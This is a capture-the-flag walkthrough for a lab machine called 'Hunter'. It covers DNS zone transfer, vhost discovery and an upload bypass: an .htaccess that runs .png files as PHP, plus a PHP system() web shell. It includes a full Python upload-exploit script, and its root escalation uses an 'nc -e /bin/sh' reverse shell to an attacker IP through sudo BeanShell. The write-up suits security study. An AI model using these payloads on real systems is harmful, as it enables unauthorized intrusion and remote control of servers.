# Lab setup
Download: Hunter
Network: NAT, target IP 192.168.1.153
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
|   2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA)
|   256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA)
|_  256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    currently available
| dns-nsid:
|_  bind.version: not currently available
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-robots.txt: 1 disallowed entry
|_hunterzone.nyx
|_http-server-header: Apache/2.4.38 (Debian)
```
The robots.txt entry in the scan reveals a domain name, and the box also runs a DNS server on 53/tcp. So first add hunterzone.nyx to /etc/hosts (pointing at 192.168.1.153), then request a zone transfer (AXFR) from that server to enumerate its subdomains:
```
┌──(root㉿kali)-[~]
└─# dig axfr hunterzone.nyx @192.168.1.153

; <<>> DiG 9.19.21-1-Debian <<>> axfr hunterzone.nyx @192.168.1.153
;; global options: +cmd
hunterzone.nyx.         604800  IN  SOA  ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800
hunterzone.nyx.         604800  IN  NS   ns1.hunterzone.nyx.
?.hunterzone.nyx.       604800  IN  TXT  "devhunter.nyx"
admin.hunterzone.nyx.   604800  IN  A    127.0.0.1
cloud.hunterzone.nyx.   604800  IN  A    127.0.0.1
ftp.hunterzone.nyx.     604800  IN  A    127.0.0.1
ns1.hunterzone.nyx.     604800  IN  A    127.0.0.1
www.hunterzone.nyx.     604800  IN  A    127.0.0.1
hunterzone.nyx.         604800  IN  SOA  ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800
;; Query time: 4 msec
;; SERVER: 192.168.1.153#53(192.168.1.153) (TCP)
;; WHEN: Mon May 27 04:39:09 EDT 2024
;; XFR size: 9 records (messages 1, bytes 294)
```
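Reading a zone transfer by hand is fine for nine records, but the two observations that matter here (every A record points at 127.0.0.1, so the names only work if pinned in /etc/hosts, and a TXT record leaks a domain outside the zone) are easy to script. The following is an added example, not code from the original write-up: it parses the dig output above, embedded as a constructed constant, and emits the hosts lines and cross-zone hints. The target IP and zone name are taken from the scan; nothing else is assumed.

```python
"""Turn a `dig axfr` dump into /etc/hosts lines and cross-zone hints.

Added example for this write-up, not code from the original post. The zone
text is the transfer shown above, embedded so the script runs offline.
"""
import re

TARGET_IP = "192.168.1.153"   # the box's real address; the zone only hands out 127.0.0.1
ZONE = "hunterzone.nyx"

# Constructed input: the AXFR answer from the write-up, dig comments included.
ZONE_TEXT = """\
; <<>> DiG 9.19.21-1-Debian <<>> axfr hunterzone.nyx @192.168.1.153
;; global options: +cmd
hunterzone.nyx.         604800  IN  SOA  ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800
hunterzone.nyx.         604800  IN  NS   ns1.hunterzone.nyx.
?.hunterzone.nyx.       604800  IN  TXT  "devhunter.nyx"
admin.hunterzone.nyx.   604800  IN  A    127.0.0.1
cloud.hunterzone.nyx.   604800  IN  A    127.0.0.1
ftp.hunterzone.nyx.     604800  IN  A    127.0.0.1
ns1.hunterzone.nyx.     604800  IN  A    127.0.0.1
www.hunterzone.nyx.     604800  IN  A    127.0.0.1
hunterzone.nyx.         604800  IN  SOA  ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800
;; XFR size: 9 records (messages 1, bytes 294)
"""

RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.+)$")
DOMAIN_RE = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+")


def parse_zone(text):
    """Return (owner, ttl, rtype, rdata) tuples; dig's ';' comment lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            owner, ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip(".").lower(), int(ttl), rtype, rdata.strip()))
    return records


def loopback_only(records):
    """True when every A record is 127.0.0.1: the zone's own answers are useless
    from the attacking box, so each name has to be pinned in /etc/hosts."""
    addrs = {rdata for _o, _t, rtype, rdata in records if rtype == "A"}
    return bool(addrs) and addrs == {"127.0.0.1"}


def hosts_entries(records, target_ip):
    """One /etc/hosts line per A-record owner plus the apex and name-server host,
    all pinned to the real target IP; order preserved, duplicates dropped."""
    names = {}
    for owner, _ttl, rtype, rdata in records:
        if rtype == "A":
            names[owner] = None
        elif rtype in ("NS", "SOA"):
            names[owner] = None                                 # zone apex
            names[rdata.split()[0].rstrip(".").lower()] = None  # NS / primary host
    return [f"{target_ip} {name}" for name in names]


def foreign_hints(records, zone):
    """Domain-looking strings in TXT rdata that lie outside the transferred zone,
    i.e. the next names to add to /etc/hosts and probe (here: devhunter.nyx)."""
    zone = zone.rstrip(".").lower()
    hints = []
    for _owner, _ttl, rtype, rdata in records:
        if rtype != "TXT":
            continue
        for dom in DOMAIN_RE.findall(rdata.lower()):
            if dom != zone and not dom.endswith("." + zone) and dom not in hints:
                hints.append(dom)
    return hints


if __name__ == "__main__":
    recs = parse_zone(ZONE_TEXT)
    print(f"{len(recs)} records; all A records loopback: {loopback_only(recs)}")
    print("\n".join(hosts_entries(recs, TARGET_IP)))
    print("domains outside the zone:", foreign_hints(recs, ZONE))
```

Pipe a real transfer in by replacing ZONE_TEXT with the captured output; the TXT scan is deliberately loose (any dotted label run) because zone comments and TXT hints in CTF boxes rarely follow a fixed format.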
None of the hunterzone.nyx names resolve to anything useful (every A record is 127.0.0.1), but the zone also contains a TXT record pointing at another domain, devhunter.nyx. Add it to /etc/hosts and test it, starting with a virtual-host brute force:
```
┌──(root㉿kali)-[~]
└─# gobuster vhost -u http://devhunter.nyx/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://devhunter.nyx/
[+] Method:          GET
[+] Threads:         100
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: files.devhunter.nyx Status: 200 [Size: 525]
```
Add files.devhunter.nyx to /etc/hosts as well; the site turns out to be a file upload form.
Fuzzing the file extension shows that both .htaccess and .png are accepted.
Upload an .htaccess that tells Apache to run .png files as PHP, then a PHP web shell saved with a .png extension; request it through the browser and you have a shell as the web server user.
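The two uploads above are the whole exploit, so it is worth seeing them concretely. The following is an added example, not the author's code: it builds the .htaccess (one AddType line that makes mod_php handle .png) and a minimal PHP shell, posts each one as a multipart upload, and then checks whether the shell actually executes or is merely served back as a raw file. The upload URL, the form field name (file) and the directory uploads are served from are assumptions; the write-up only says the form accepts .htaccess and .png. It also assumes mod_php and an AllowOverride setting that permits FileInfo, which is what lets a per-directory .htaccess change handlers.

```python
"""Upload an .htaccess that makes Apache execute .png as PHP, then a PHP shell
named with a .png extension, and verify that it runs.

Added example for this write-up, not the author's code. UPLOAD_URL,
FIELD_NAME and UPLOAD_DIR are assumptions; the page does not give them.
"""
import urllib.parse
import urllib.request
import uuid

UPLOAD_URL = "http://files.devhunter.nyx/"          # assumed: where the form posts
FIELD_NAME = "file"                                  # assumed: name of the file input
UPLOAD_DIR = "http://files.devhunter.nyx/uploads/"   # assumed: where uploads are served

# mod_php executes anything typed application/x-httpd-php, so this single line
# turns every .png in the directory (and its subdirectories) into PHP.
HTACCESS = b"AddType application/x-httpd-php .png\n"

# Minimal shell: only runs a command when ?cmd= is supplied.
WEBSHELL = b"<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>\n"


def build_multipart(field, filename, content, boundary=None):
    """Return (body, content_type) for a single-file multipart/form-data POST."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def upload(url, field, filename, content):
    """POST one file to the form; returns (HTTP status, response body)."""
    body, ctype = build_multipart(field, filename, content)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read()


def run_cmd(shell_url, cmd):
    """GET shell_url?cmd=<cmd> and return the raw response body."""
    url = shell_url + "?" + urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read()


def looks_executed(response_body):
    """Tell 'PHP ran' from 'file served raw' for cmd=id: real output contains
    uid=, while a raw hit echoes the <?php source back instead."""
    return b"uid=" in response_body and b"<?php" not in response_body


if __name__ == "__main__":
    # .htaccess first, so the shell is executable the moment it lands.
    for name, data in ((".htaccess", HTACCESS), ("shell.png", WEBSHELL)):
        status, _ = upload(UPLOAD_URL, FIELD_NAME, name, data)
        print(f"uploaded {name}: HTTP {status}")
    out = run_cmd(UPLOAD_DIR + "shell.png", "id")
    if looks_executed(out):
        print("PHP executes .png:", out.decode(errors="replace").strip())
    else:
        print("served raw: .htaccess ignored (AllowOverride) or wrong upload path")
```

The raw-versus-executed check is the part people skip: if AllowOverride is None for that directory the .htaccess is silently ignored, the upload "succeeds", and the .png is just downloaded, so the test is whether cmd=id returns a uid line rather than the PHP source.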
# Privilege escalation
Run sudo -l on the box.
It shows that bsh (BeanShell, a Java scripting shell) can be run with sudo. BeanShell exposes an exec() builtin that runs an OS command, so a reverse shell can be launched as root:
```
bug@hunter:/$ sudo bsh
BeanShell 2.0b4 - by Pat Niemeyer ([email protected])
bsh % exec("/usr/bin/nc -e /bin/sh 192.168.1.129 4444");
```
With a listener waiting on the attacking machine (192.168.1.129, port 4444) beforehand, a root shell comes back. Note that BeanShell's exec() passes the string straight to Java's Runtime.exec(), which only splits on whitespace and does not interpret shell syntax, so redirection-based payloads will not work there; if the target's nc has no -e, call Runtime.getRuntime().exec() from the bsh prompt with a String array of /bin/sh, -c and the command instead.